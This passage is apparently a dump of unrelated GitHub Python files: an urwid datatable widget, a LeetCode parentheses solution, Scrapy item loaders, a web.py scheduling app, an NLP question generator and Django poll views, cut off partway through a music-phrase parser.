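The default sort key above, `lambda x: (x is None, x)`, tuples each value with a None flag so that mixed None/non-None columns sort without a TypeError. In isolation:

```python
# None-safe ordering: the boolean sorts False (non-None) before True (None),
# so None values group at the end instead of breaking the comparison.
values = [3, None, 1, None, 2]
print(sorted(values, key=lambda x: (x is None, x)))  # [1, 2, 3, None, None]
```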
self.df.sort_columns(\n            column,\n            key = key,\n            reverse = self.sort_by[1])\n        self._modified()\n\n\n    def set_focus_column(self, index):\n        if self.with_header:\n            self.header.set_focus_column(self.sort_column)\n\n        if self.with_footer:\n            self.footer.set_focus_column(self.sort_column)\n\n        # logger.debug(\"set_focus_column: %d\" %(index))\n        self.df[\"_focus_position\"] = index\n        self.df[\"_dirty\"] = True\n\n    def cycle_sort_column(self, step):\n\n        if not self.ui_sort:\n            return\n        if self.sort_column is None:\n            index = 0\n        else:\n            index = (self.sort_column + step)\n            if index < 0: index = len(self.visible_columns)-1\n            if index > len(self.visible_columns)-1: index = 0\n        logger.debug(\"index: %d\" %(index))\n        self.sort_by_column(index)\n\n    def sort_index(self):\n        self.df.sort_index()\n        self._modified()\n\n    def requery(self, offset=0, load_all=False, **kwargs):\n\n        # logger.info(\"requery\")\n        kwargs = {\"load_all\": load_all}\n        if self.query_sort:\n            kwargs[\"sort\"] = self.sort_by\n        else:\n            kwargs[\"sort\"] = (None, False)\n        if self.limit:\n            kwargs[\"offset\"] = offset\n            kwargs[\"limit\"] = self.limit\n\n        rows = list(self.query(**kwargs))\n        # self.offset += self.limit\n        # logger.info(\"offset: %s\" %(self.offset))\n        self.append_rows(rows)\n        self.refresh_calculated_fields()\n        self.apply_filters()\n        # for r in rows:\n        #     self.refresh_calculated_fields(r[self.index])\n\n\n\n    def append_rows(self, rows):\n        # logger.info(\"append_rows: %s\" %([row[self.index] for row in rows]))\n        self.df.append_rows(rows)\n        self.df[\"_focus_position\"] = self.sort_column\n        self.invalidate()\n        self._modified()\n\n    def add_columns(self, columns, data=None):\n\n        if not isinstance(columns, list):\n            columns = [columns]\n            if data:\n                data = [data]\n\n        self.columns += columns\n        for i, column in enumerate(columns):\n            self.df[column.name] = data[i] if data else None\n\n        self.invalidate()\n\n    def remove_columns(self, columns):\n\n        if not isinstance(columns, list):\n            columns = [columns]\n\n        columns = [ self.columns[column].name\n                    if isinstance(column, int)\n                    else column for column in columns ]\n\n        self.columns = [ c for c in self.columns if c.name not in columns ]\n        self.df.delete_columns(columns)\n        self.invalidate()\n\n    def set_columns(self, columns):\n        self.remove_columns([c.name for c in self.columns])\n        self.add_columns(columns)\n        self.reset()\n\n    def toggle_columns(self, columns, show=None):\n\n        if not isinstance(columns, list):\n            columns = [columns]\n\n        for column in columns:\n            if isinstance(column, int):\n                try:\n                    column = self.columns[column]\n                except IndexError:\n                    raise Exception(\"bad column number: %d\" %(column))\n            else:\n                try:\n                    column = next(( c for c in self.columns if c.name == column))\n                except StopIteration:\n                    raise Exception(\"column %s not found\" %(column))\n\n            if show is None:\n                column.hide = not column.hide\n            else:\n                column.hide = not show\n        self.invalidate()\n\n    def show_columns(self, columns):\n        self.toggle_columns(columns, True)\n\n    def hide_columns(self, columns):\n        self.toggle_columns(columns, False)\n\n    def toggle_details(self):\n        self.selection.toggle_details()\n\n    @property\n    def visible_columns(self):\n        return [ c for c in self.columns if not c.hide ]\n\n    def add_row(self, data, sort=True):\n        # raise Exception(data)\n        self.append_rows([data])\n        if sort:\n            self.sort_by_column()\n        self.apply_filters()\n        # else:\n        #     self.invalidate()\n\n    def delete_rows(self, indexes):\n        self.df.delete_rows(indexes)\n        self.apply_filters()\n        if self.focus_position >= len(self)-1:\n            self.focus_position = len(self)-1\n        # if 
self.focus > len(self)-1:\n # self.focus = len(self)-1\n # self._modified()\n # self.invalidate()\n\n\n def invalidate(self):\n self.df[\"_dirty\"] = True\n if self.with_header:\n self.header.update()\n if self.with_footer:\n self.footer.update()\n self._modified()\n\n def invalidate_rows(self, indexes):\n if not isinstance(indexes, list):\n indexes = [indexes]\n for index in indexes:\n self.refresh_calculated_fields(index)\n\n self.df[indexes, \"_dirty\"] = True\n self._modified()\n # FIXME: update header / footer if dynamic\n\n def swap_rows_by_field(self, p0, p1, field=None):\n\n if not field:\n field=self.index\n\n i0 = self.position_to_index(p0)\n i1 = self.position_to_index(p1)\n\n r0 = { k: v[0] for k, v in list(self.df[i0, None].to_dict().items()) }\n r1 = { k: v[0] for k, v in list(self.df[i1, None].to_dict().items()) }\n\n for k, v in list(r0.items()):\n if k != field:\n self.df.set(i1, k, v)\n\n for k, v in list(r1.items()):\n if k != field:\n self.df.set(i0, k, v)\n self.df.set(i0, \"_dirty\", True)\n\n self.invalidate_rows([i0, i1])\n\n def swap_rows(self, p0, p1, field=None):\n # r0 = self[self.position_to_index(p0)]\n # r1 = self[self.position_to_index(p1)]\n self.swap_rows_by_field(p0, p1, field=field)\n\n def row_count(self):\n\n if not self.with_scrollbar:\n return None\n\n if self.limit:\n if self.page*self.limit >= self.query_result_count():\n return len(self.filtered_rows)\n else:\n return self.query_result_count()\n else:\n return len(self)\n\n def load_more(self):\n offset = self.page*self.limit\n if offset >= self.row_count():# or offset >= len(self):\n return\n logger.info(\"load_more: page: %s, offset: %s, len: %s\" %(self.page, offset, self.row_count()))\n self.requery(offset)\n self.page += 1\n\n def load_all(self):\n if len(self) >= self.query_result_count():\n return\n logger.info(\"load_all: %s\" %(self.page))\n self.requery(self.page*self.limit, load_all=True)\n self.page = (self.query_result_count() // self.limit)\n self.listbox._invalidate()\n\n def apply_filters(self, filters=None):\n\n if not filters:\n filters = self.filters\n elif not isinstance(filters, list):\n filters = [filters]\n\n self.filtered_rows = blist(\n i\n for i, row in enumerate(self.df.iterrows())\n if not filters or all(\n f(row)\n for f in filters\n )\n )\n if self.focus_position > len(self):\n self.focus_position = len(self)-1\n\n # logger.info(\"filtered: %s\" %(self.filtered_rows))\n\n\n self.filters = filters\n self.invalidate()\n\n def clear_filters(self):\n self.filtered_rows = blist(range(len(self.df)))\n self.filters = None\n self.invalidate()\n\n def reset(self, reset_sort=False):\n logger.debug(\"reset\")\n # self.offset = 0\n # if self.query_sort:\n # self.df.clear()\n # if requery or self.query_sort:\n self.df.clear()\n self.requery()\n self.page = 1\n self.clear_filters()\n self.apply_filters()\n if reset_sort:\n self.sort_by_column(self.initial_sort)\n self.focus_position = 0\n # self.invalidate()\n\n def load(self, path):\n\n with open(path, \"r\") as f:\n json = \"\\n\".join(f.readlines())\n self.df = DataTableDataFrame.from_json(json)\n self.reset()\n\n def save(self, path):\n # print(path)\n with open(path, \"w\") as f:\n f.write(self.df.to_json())\n\n # def keypress(self, size, key):\n # if key != \"enter\":\n # return key\n # urwid.emit_signal(self, \"select\")\n\n # def mouse_event(self, size, event, button, col, row, focus):\n # if event == 'mouse press':\n # urwid.emit_signal(self, 
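apply_filters() above keeps the positions of rows for which every predicate returns True. The convention, sketched on plain dicts (data invented for illustration):

```python
# Each filter is a callable row -> bool; a row stays visible only if all pass.
rows = [{"age": 17}, {"age": 30}, {"age": 42}]
filters = [lambda row: row["age"] >= 21, lambda row: row["age"] < 40]
visible = [i for i, row in enumerate(rows) if all(f(row) for f in filters)]
print(visible)  # [1]
```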
\"click\")\n","repo_name":"tonycpsu/urwid-datatable","sub_path":"urwid_datatable/datatable.py","file_name":"datatable.py","file_ext":"py","file_size_in_byte":33518,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"73392196879","text":"# -*- coding: utf-8 -*-\n\n# __author__ = xiaobao\n# __date__ = 2019/09/27 22:19:09\n\n# desc: \n# Given a string containing just the characters '(',')','{','}','[',']', determine whether the string is valid.\n\n# A valid string must satisfy:\n\n# Open brackets must be closed by the same type of bracket.\n# Open brackets must be closed in the correct order.\n# Note that an empty string is also considered valid.\n\n# Example 1:\n\n# Input: \"()\"\n# Output: true\n# Example 2:\n\n# Input: \"()[]{}\"\n# Output: true\n# Example 3:\n\n# Input: \"(]\"\n# Output: false\n# Example 4:\n\n# Input: \"([)]\"\n# Output: false\n# Example 5:\n\n# Input: \"{[]}\"\n# Output: true\n\n\n# Source: LeetCode (leetcode-cn)\n# Link: https://leetcode-cn.com/problems/valid-parentheses\n# Copyright belongs to LeetCode. Commercial reprints require official authorization; non-commercial reprints must cite the source.\n\n\nclass StackCls(object):\n    def __init__(self):\n        self.m_listObj = []\n        self.m_nCount = 0\n    \n    def Push(self, obj):\n        self.m_nCount += 1\n        self.m_listObj.append(obj)\n\n    def Pop(self):\n        if self.m_nCount <= 0:\n            return None\n        self.m_nCount -= 1\n        return self.m_listObj.pop()\n\n\nclass Solution:\n    def isValid(self, s):\n        stackObj = StackCls()\n        dictLeft = {\"(\":\")\", \"[\":\"]\", \"{\":\"}\"}\n        dictRight = {\")\":\"(\", \"]\":\"[\", \"}\":\"{\"}\n        for char in s:\n            if char in dictLeft:\n                stackObj.Push(char)\n            elif char in dictRight:\n                charPop = stackObj.Pop()\n                if dictRight[char] != charPop:\n                    return False\n            else:\n                return False\n        \n        return stackObj.Pop() is None\n\nsolutionObj = Solution()\n# empty string\nassert(solutionObj.isValid(\"\"))# 0\n# paired, nested\nassert(solutionObj.isValid(\"{[()()][]}\"))# 0\n# unpaired\nassert(solutionObj.isValid(\"{\") == False)# 0\nassert(solutionObj.isValid(\"}\") == False)# 0","repo_name":"xiewendan/algorithm","sub_path":"leetcode/20 valid-parentheses.py","file_name":"20 valid-parentheses.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72441995918","text":"from collections import namedtuple\n\n\nclass RoomConstants:\n    class RoomType:\n        SINGLE = 1\n        GROUP = 2\n\n    class Status:\n        NORMAL = 1\n\n\nclass RoomMessageConstants:\n    class IsRead:\n        YES = 1\n        NO = 0\n\n\nPF_DB_NAME = \"senguopf\"\n\n\nclass DefaultObject:\n    ACCOUNT_INFO = namedtuple(\n        \"account_info\",\n        [\n            \"id\",\n            \"name\",\n            \"headimgurl\",\n            \"sex\",\n            \"debt_rest\",\n            \"remark\",\n            \"nickname\",\n            \"realname\",\n            \"passport_id\",\n        ],\n    )(0, \"\", \"\", 0, 0, \"\", \"\", \"\", 0)\n\n    SHOP_INFO = namedtuple(\n        \"account_info\",\n        [\n            \"id\",\n            \"boss_id\",\n            \"shop_name\",\n            \"shop_img\",\n            \"shop_phone\",\n            \"shop_address\",\n            \"shop_province\",\n            \"shop_city\",\n            \"shop_county\",\n            \"has_done\",\n            \"merchant_name\",\n            \"industry_type\",\n            \"business_license\",\n            \"realname\",\n            \"nickname\",\n            \"market_id\",\n        ],\n    )(0, 0, \"\", \"\", \"\", \"\", \"\", \"\", \"\", -1, \"\", 0, \"\", \"\", \"\", 0)\n","repo_name":"georgeye323/george_im","sub_path":"senguo_im/chat/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"23371527639","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import TakeFirst, MapCompose\n\n\ndef add_schema(url, loader_context):\n    
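The valid-parentheses solution above wraps a list in a StackCls. A shorter idiomatic sketch of the same algorithm, using a plain list as the stack and mapping closers to openers:

```python
# Same stack algorithm, condensed: push openers, pop and compare on closers.
def is_valid(s: str) -> bool:
    pairs = {")": "(", "]": "[", "}": "{"}
    stack = []
    for ch in s:
        if ch in "([{":
            stack.append(ch)
        elif ch in pairs:
            if not stack or stack.pop() != pairs[ch]:
                return False
        else:
            return False
    return not stack  # valid only if every opener was closed

assert is_valid("{[()()][]}") and not is_valid("([)]")
```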
response = loader_context['response']\n    if response:\n        return response.urljoin(url)\n    else:\n        return 'http:' + url\n\n\nclass OoxxItem(scrapy.Item):\n    author_name = scrapy.Field()\n    pic_url = scrapy.Field()\n    pub_date = scrapy.Field()\n    result = scrapy.Field()\n\n\nclass OoxxItemLoader(ItemLoader):\n    author_name_in = MapCompose(str.strip)\n    author_name_out = TakeFirst()\n\n    pic_url_in = MapCompose(add_schema)\n    # pic_url_out = TakeFirst()\n\n    pub_date_in = MapCompose(str.strip)\n    pub_date_out = TakeFirst()\n","repo_name":"ygsun/misc","sub_path":"jandan/jandan/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21383028618","text":"# -*- coding: utf-8 -*-\n# @Author: SHLLL\n# @email: shlll7347@gmail.com\n# @Date: 2018-09-23 17:24:50\n# @License: MIT LICENSE\n# @Last Modified by: SHLLL\n# @Last Modified time: 2018-10-14 17:26:12\n\nimport web\nimport json\nfrom hosarg.utils import DataPerpare\nfrom hosarg.utils import dataprepare\nfrom hosarg.utils.datapreprocess import PersonData\nfrom hosarg.arrange.wardarrangeAPI import WardArrangeAPI\nfrom hosarg.utils.datapreprocess.personDataApi import PersonDataApi\n\nurls = (\n    '/', 'Index',\n    '/login', 'Login',\n    '/logout', 'Logout',\n    '/index.html', 'Index',\n    '/user.html', 'User',\n    '/depart.html', 'Depart',\n    '/ward.html', 'Ward',\n    '/api/peopledata', 'APIPeopledata',\n    '/api/departdata', \"APIDepartdata\",\n    '/api/warddata', 'APIWard',\n    '/api/uploadData', 'APIUpload',\n    '/api/clearData', 'APIClear',\n    '/api/backupData', 'APIBackup'\n)\n\napp = web.application(urls, globals())\nrender = web.template.render(\"templete/\")\n# Read the data directly from the JSON database\ndata_struct = {'data': DataPerpare(2).data}\n\n\n# Store the session someplace we can access from anywhere\n# This fixes the problem caused by the server refreshing,\n# which arose due to webpy default debug mode.\nweb.config.session_parameters['timeout'] = 3600 # cookie timeout for 3600s\nif not web.config.get('session'):\n    # Define the initial session\n    # Store the data in the directory './sessions'\n    store = web.session.DiskStore('hosarg/data/sessions')\n    session = web.session.Session(app, store, initializer={'login': 0})\n\n    # Store it somewhere we can access\n    web.config.session = session\nelse:\n    # If it is already created, just use the old one\n    session = web.config.session\n\n\ndef logged():\n    '''Check whether the user is already logged in'''\n    if session.login == 1:\n        return True\n    else:\n        return False\n\n\nclass Login(object):\n    def GET(self):\n        if logged():\n            raise web.seeother('/index.html')\n        else:\n            return render.login('')\n\n    def POST(self):\n        name, passwd = web.input().name, web.input().passwd\n\n        if name == 'arrange' and passwd == 'zxcdsaqwe321':\n            session.login = 1\n            return web.seeother('/index.html')\n        else:\n            session.login = 0\n            return render.login('Incorrect username or password, please try again')\n\n\nclass Logout(object):\n    def GET(self):\n        session.kill()  # clear the session\n        raise web.seeother('/login')\n\n\nclass Index(object):\n    def GET(self):\n        if logged():\n            return render.index()\n        else:\n            raise web.seeother('/login')\n\n\nclass User(object):\n    def GET(self):\n        if logged():\n            return render.user()\n        else:\n            raise web.seeother('/login')\n\n\nclass Depart(object):\n    def GET(self):\n        if logged():\n            return render.depart()\n        else:\n            raise web.seeother('/login')\n\n\nclass Ward(object):\n    def GET(self):\n        if logged():\n            return render.ward()\n        else:\n            raise web.seeother('/login')\n\n\nclass APIPeopledata(object):\n    def GET(self):\n        
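OoxxItemLoader above declares its field processors. A quick sketch exercising those processors directly, assuming the same (older) scrapy.loader.processors import path used in the file:

```python
# MapCompose applies a function to every extracted value; TakeFirst keeps
# the first non-empty one when the field is single-valued.
from scrapy.loader.processors import MapCompose, TakeFirst

strip_in = MapCompose(str.strip)
first_out = TakeFirst()
print(first_out(strip_in(["  xiaobao  ", " other "])))  # 'xiaobao'
```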
data_struct['data'] = DataPerpare(2).data\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps(data_struct['data'])\n\n def POST(self):\n data = str(web.data(), encoding='utf-8')\n data = json.loads(data)\n data_struct['data'] = data\n PersonData(data).working(3)\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'ok'})\n\n\nclass APIDepartdata(object):\n def GET(self):\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'error'})\n\n def POST(self):\n data = str(web.data(), encoding='utf-8')\n data = json.loads(data)\n data_struct['depart'] = data\n WardArrangeAPI(data_struct['data']).update_person_data(data)\n data_struct['slice'] = WardArrangeAPI(\n data_struct['data']).slice_people(data['data'])\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps(data_struct['slice'])\n\n\nclass APIWard(object):\n def GET(self):\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'error'})\n\n def POST(self):\n data = str(web.data(), encoding='utf-8')\n data = json.loads(data)\n depart_data = data['people']\n date_data = data['range']\n data_struct['depart'] = depart_data\n data_struct['ward'] = WardArrangeAPI(data_struct['data'])\\\n .arrange_ward(\n depart_data,\n date_data['month'],\n date_data['startday'],\n date_data['endday'],\n date_data['data']\n )\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps(data_struct['ward'])\n\n\nclass APIUpload(object):\n def GET(self):\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'error'})\n\n def POST(self):\n data = str(web.data(), encoding='utf-8')\n data = json.loads(data)\n PersonDataApi(data_struct['data']).write_2_json(data)\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'ok'})\n\n\nclass APIClear(object):\n def GET(self):\n PersonDataApi(data_struct['data']).clear_2_json()\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'ok'})\n\n def POST(self):\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n return json.dumps({'status': 'error'})\n\n\nclass APIBackup(object):\n def GET(self):\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n data = dataprepare.backup_get_data(data_struct['data'])\n return json.dumps(data)\n\n def POST(self):\n data = str(web.data(), encoding='utf-8')\n data = json.loads(data)\n web.header('Content-Type', 'application/json')\n web.header('Access-Control-Allow-Origin', '*')\n dataprepare.backup_set_data(data_struct['data'], data)\n return json.dumps({'status': 'ok'})\n\n\napplication = app.wsgifunc()\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"shlllshlll/Arrangement","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"28534030302","text":"# uncomment to suppress warnings about version\nimport 
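Every handler above repeats the same two web.header() calls before json.dumps(). A small helper (hypothetical, not part of the original app) would collapse that boilerplate:

```python
# Sketch: centralize the JSON/CORS headers used by all API handlers above.
def json_response(payload):
    web.header('Content-Type', 'application/json')
    web.header('Access-Control-Allow-Origin', '*')
    return json.dumps(payload)

# e.g. inside a GET handler:
#     return json_response({'status': 'ok'})
```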
warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport nltk\nimport spacy\nimport benepar\nfrom benepar.spacy_plugin import BeneparComponent\nfrom nltk.corpus import wordnet as wn\nimport simpleBinary\n\n#python -m pip install tensorflow==1.14 will help.\ndef preprocess(sentence):\n clauses = [] \n nlp = spacy.load(\"en_core_web_sm\")\n nlp.add_pipe(BeneparComponent('benepar_en2'))\n doc = nlp(sentence)\n if len(list(doc.sents)) == 0:\n return clauses\n sent = list(doc.sents)[0]\n children = list(sent._.children)\n puncts = '?!.,;:-'\n for clause in children: \n if clause.text not in puncts:\n if 'S' in clause._.labels:\n clauses.append((clause.text + '.'))\n \n if not clauses:\n return [sentence]\n else:\n return clauses\n\n# should only enter this function if the root of the syntax\n# tree is a VP (verb phrase)\ndef ask_compound_bin_question(sentence):\n nlp = spacy.load(\"en_core_web_sm\")\n doc = nlp(sentence)\n lemmas = []\n correct_do = ''\n subject_explained = ''\n subjects = [] \n subj = None\n # lemmatize verb\n for token in doc:\n if 'subj' in token.dep_:\n subj = token.text\n subject_explained = spacy.explain(token.tag_)\n subjects.append(token)\n elif 'conj' in token.dep_ and token.head.text == 'subj': \n subjects.append(token.head.text) \n if token.pos_ == \"VERB\":\n verb_explained = spacy.explain(token.tag_)\n\n if 'present' in verb_explained:\n if len(subjects)>1: \n correct_do = 'Do'\n elif 'plural' in subject_explained:\n correct_do = 'Do'\n elif 'personal' in subject_explained:\n correct_do = 'Do'\n elif 'singular' in verb_explained: \n correct_do = 'Does'\n # use past tense inflection\n else:\n correct_do = 'Did'\n lemmas.append(token.lemma_)\n\n # construct question\n question = correct_do\n after_subj = False\n # add in subject\n i = 0\n while i < len(doc): \n token = doc[i]\n\n if 'subj' in token.dep_:\n if token.pos_ == 'PRON' and token.text != 'I':\n question += ' ' + token.text.lower()\n else:\n question += ' ' + token.text\n after_subj = True\n # account for case of gerund/present participle\n # go + verb-ing\n elif token.pos_ == 'VERB' and 'gerund' not in spacy.explain(token.tag_):\n question += ' ' + lemmas.pop(0) \n elif token.pos_ == 'DET': \n question += ' ' + token.text.lower() \n elif token.pos_ == 'INTJ' and not after_subj: \n i += 1\n # end question at punctuation\n elif 'sentence closer' in spacy.explain(token.tag_):\n question += '?'\n return question \n else:\n question += ' ' + token.text\n\n i += 1\n\n return question\n\ndef postprocess (sentences):\n questions = []\n for sentence in sentences:\n qn = ask_compound_bin_question(sentence)\n questions.append((qn, sentence))\n '''\n wordNetQns = simpleBinary.useWordNet(qn)\n for qn in wordNetQns:\n questions.append((qn, sentence))\n '''\n return questions\n\ndef ask_q (sentence):\n sentences = preprocess(sentence)\n questions = postprocess(sentences)\n return questions\n\n'''\n\ns4 = 'Unfortunately for their mother, Alice and Bob really hate brussel sprouts.'\n# print(ask_q(s4))\n\n[('Does Unfortunately for their mother , Alice and Bob really hate brussel sprouts?', 'Unfortunately for their mother, Alice and Bob really hate brussel sprouts.'), \n('Does Unfortunately for their parent , Alice and Bob really hate brussel sprouts?', 'Unfortunately for their mother, Alice and Bob really hate brussel sprouts.'), \n('Does Unfortunately for their father , Alice and Bob really hate brussel sprouts?', 'Unfortunately for their mother, Alice and Bob really hate brussel sprouts.'), \n('Does Unfortunately for their 
mother , Alice and Bob really love brussel sprouts?', 'Unfortunately for their mother, Alice and Bob really hate brussel sprouts.')]\n\n\n\ns5 = 'Alice, who is nice, said hi to me.'\nprint(ask_q(s5))\n\n[('Did Alice , who is nice , say hi to me?', 'Alice, who is nice, said hi to me.'), \n('Did Alice , who is nasty , say hi to me?', 'Alice, who is nice, said hi to me.'), \n('Did Alice , who is nice , say greeting to me?', 'Alice, who is nice, said hi to me.'), \n('Did Alice , who is nice , say hello to me?', 'Alice, who is nice, said hi to me.')]\n\n\n\ns6 = 'Alice said hi, but I forgot to reply.'\nprint(ask_q(s6))\n\n[('Did Alice say hi?', 'Alice said hi.'), \n('Did Alice say greeting?', 'Alice said hi.'), \n('Did Alice say hello?', 'Alice said hi.'), \n('Did I forgot to reply?', 'I forgot to reply.'), \n('Did I forget to reply?', 'I forgot to reply.'), \n('Did I remember to reply?', 'I forgot to reply.'), \n('Did I forgot to answer?', 'I forgot to reply.')]\n\n\ns7 = 'I went to the store, however, Alice said hello.'\nprint(ask_q(s7))\n\n[('Did I go to the store?', 'I went to the store.'), \n('Did I stay_in_place to the store?', 'I went to the store.'), \n('Did I go to the mercantile_establishment?', 'I went to the store.'), \n('Did I go to the shop?', 'I went to the store.'), \n('Did Alice say hello?', 'Alice said hello.'), \n('Did Alice say greeting?', 'Alice said hello.')]\n\n\ns8 = 'Alice ran yesterday.'\nprint(ask_q(s8))\n\n[('Did Alice run yesterday?', 'Alice ran yesterday.'), \n('Did Alice malfunction yesterday?', 'Alice ran yesterday.'), \n('Did Alice run day?', 'Alice ran yesterday.')]\n\n\ns9 = 'Alan Turing liked potatoes because they are delicious.'\nprint(ask_q(s9)) \n\n\n[('Did Alan Turing like potatoes because they are delicious?', 'Alan Turing liked potatoes because they are delicious.')]\n\n\n'''","repo_name":"asam01/11411-QA-Project","sub_path":"asking/compoundBinary.py","file_name":"compoundBinary.py","file_ext":"py","file_size_in_byte":5961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19106742456","text":"from django.contrib import admin\nfrom django.conf.urls import url, include\nfrom . 
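ask_compound_bin_question() above chooses its auxiliary from tense and subject number. That rule, condensed into a standalone sketch (the two inputs stand in for the spaCy tag checks):

```python
# Auxiliary selection: past tense takes "Did"; present tense takes "Do"
# for plural/personal subjects and "Does" for singular ones.
def pick_auxiliary(tense: str, subject_is_plural: bool) -> str:
    if tense == "past":
        return "Did"
    return "Do" if subject_is_plural else "Does"

assert pick_auxiliary("past", False) == "Did"
assert pick_auxiliary("present", True) == "Do"
assert pick_auxiliary("present", False) == "Does"
```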
import views\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^help/', views.help, name='help'),\n url(r'^users/', include('users.urls')),\n url(r'^tables/', include('tables.urls')),\n url(r'^admin/', admin.site.urls),\n]\n","repo_name":"Blackout76/evepoker","sub_path":"evepoker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35926629283","text":"from django.shortcuts import render, HttpResponse\n\nfrom .models import Category, Candidate\nfrom .forms import Submit\n\n\ndef submit_form(request):\n if request.method == 'POST':\n form = Submit(request.POST)\n\n if form.is_valid():\n category = form.cleaned_data.get('category').lower()\n candidate = form.cleaned_data.get('candidate').lower()\n\n if Category.objects.filter(type=category).exists():\n existed_cat = Category.objects.get(type=category)\n new_entry_count = existed_cat.entry_count + 1\n existed_cat.entry_count = new_entry_count\n existed_cat.save()\n\n if Candidate.objects.filter(name=candidate).exists():\n existed_can = Candidate.objects.get(name=candidate)\n new_vote_count = existed_can.vote_count + 1\n existed_can.vote_count = new_vote_count\n existed_can.save()\n else:\n data_2 = Candidate(name=candidate, vote_count=1, category=existed_cat)\n data_2.save()\n else:\n data_1 = Category(type=category, entry_count=1)\n data_1.save()\n\n data_2 = Candidate(name=candidate, vote_count=1, category=Category.objects.get(type=category))\n data_2.save()\n\n return HttpResponse('We registered your form. Category for: {} and your candidate is: {}'\n .format(category, candidate))\n else:\n form = Submit()\n\n return render(request, 'poll/formpage.html', {'form': form})\n","repo_name":"kayyum1905/ananymous_voting_platform","sub_path":"voting_platform/poll/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2027432206","text":"import csv\nimport json\nimport numpy as np\nfrom fractions import Fraction\n\nclass PhraseGroundtruth:\n\tdef __init__(self, src):\n\t\twith open(src, 'r', encoding='utf-8', errors='ignore') as f:\n\t\t\tcsv_file = [n for n in csv.reader(f)]\n\n\t\t\tself.time_signature = csv_file[0][1].split(' : ')[1]\n\t\t\tself.beats_per_bar, self.note_value \\\n\t\t\t\t\t = list(map(int, self.time_signature.split('/')))\n\t\t\tself.phrases = [n for n in csv_file[1:]]\n\n\t# nth phrase\n\tdef phrase(self, n=1):\n\t\tphrase = list(map(Fraction, self.phrases[n-1][:-2])) + \\\n\t\t\t\t\t\t\t\t\t[self.phrases[n-1][-2]]\n\t\ton_note = phrase[0] + Fraction(phrase[1]/self.beats_per_bar)\n\t\toff_note = phrase[2] + Fraction(phrase[3]/self.beats_per_bar)\n\t\tduration = off_note - on_note + Fraction(phrase[4]/self.beats_per_bar)\n\t\treturn on_note, off_note, duration\n\n\tdef phrase_in_ratio(self):\n\t\tphrases = []\n\t\tfor n in range(len(self.phrases)):\n\t\t\tphrases += [self.phrase(n)[1]] + [self.phrase(n)[0]]\n\t\treturn np.unique(phrases)\n\n\tdef phrase_in_measure(self):\n\t\tphrases = []\n\t\tfor n in range(len(self.phrases)):\n\t\t\ton, off, _ = self.phrase(n)\n\t\t\tphrases.append(int(on))\n\t\t\tphrases.append(int(off))\n\t\treturn np.unique(phrases)\n\nclass Syncopation:\n\tdef __init__(self, path='../data/Syncopation', score='b_20_1', model='WNBD', track='R'):\n\t\tself.src = ('%s/%s_syncopation/%s_%s_%s.json')%(path, score, score, 
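The vote-tallying view above does read-modify-write updates on entry_count and vote_count. A hedged alternative sketch using get_or_create plus F() expressions, which turns each increment into a single atomic UPDATE (field and model names follow the code above):

```python
# Sketch: atomic counters with F() avoid lost updates under concurrent votes.
from django.db.models import F

def register_vote(category_name, candidate_name):
    category, _ = Category.objects.get_or_create(
        type=category_name.lower(), defaults={"entry_count": 0})
    Category.objects.filter(pk=category.pk).update(entry_count=F("entry_count") + 1)
    candidate, _ = Candidate.objects.get_or_create(
        name=candidate_name.lower(),
        defaults={"vote_count": 0, "category": category})
    Candidate.objects.filter(pk=candidate.pk).update(vote_count=F("vote_count") + 1)
```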
